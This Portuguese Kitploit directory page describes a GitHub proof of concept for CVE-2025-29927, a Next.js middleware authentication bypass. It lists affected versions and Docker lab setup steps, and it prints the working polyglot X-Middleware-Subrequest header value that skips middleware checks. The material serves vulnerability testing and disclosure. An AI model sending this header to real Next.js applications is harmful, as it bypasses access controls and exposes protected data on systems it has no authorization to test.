Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29927-PoC — PoC para CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js. Demonstra como x-middleware-subrequest pode contornar verificações de autenticação. Inclui configuração Docker para testes. | Kitploit
Ferramentas/GitHubGitHub/alihussainzada/cve-2025-29927-poc
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubalihussainzada/cve-2025-29927-poc

CVE-2025-29927-PoC

PoC para CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js. Demonstra como x-middleware-subrequest pode contornar verificações de autenticação. Inclui configuração Docker para testes.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
5há 1 anoAinda não revisado

CVE-2025-29927: PoC da Vulnerabilidade de Bypass do Middleware do Next.js

Este repositório demonstra a vulnerabilidade CVE-2025-29927 no Next.js, onde o cabeçalho interno x-middleware-subrequest pode ser usado para contornar verificações de middleware, como autenticação.

Versões Afetadas

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9

Passos para Reproduzir

1. Clone o Repositório:

root@kitploit:~
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git

2. Navegue até a Pasta do Projeto:

root@kitploit:~
cd CVE-2025-29927-PoC

3. Gere um Segredo:

root@kitploit:~
openssl rand -base64 32

4. Atualize o Segredo no Arquivo .env:

root@kitploit:~
NEXTAUTH_SECRET=your_generated_secret

5. Construa e Execute com Docker:

root@kitploit:~
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs

Prova de Conceito

Podemos simplificar bastante a exploração desse problema usando um poliglota que nos permite cobrir efetivamente os vários casos potenciais. Conseguimos isso com o seguinte cabeçalho HTTP, usado para verificar a presença de um bypass de autenticação:

root@kitploit:~
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Redireciona usuários

Exemplo de Exploração

Créditos/Fontes

  • Blog do Next.js sobre CVE-2025-29927
  • Pesquisa de Segurança Web da Zhero: Next.js e o Middleware Corrompido
  • Pesquisa de Segurança da Assetnote: Analisando o Bypass do Middleware do Next.js
Baixar ferramenta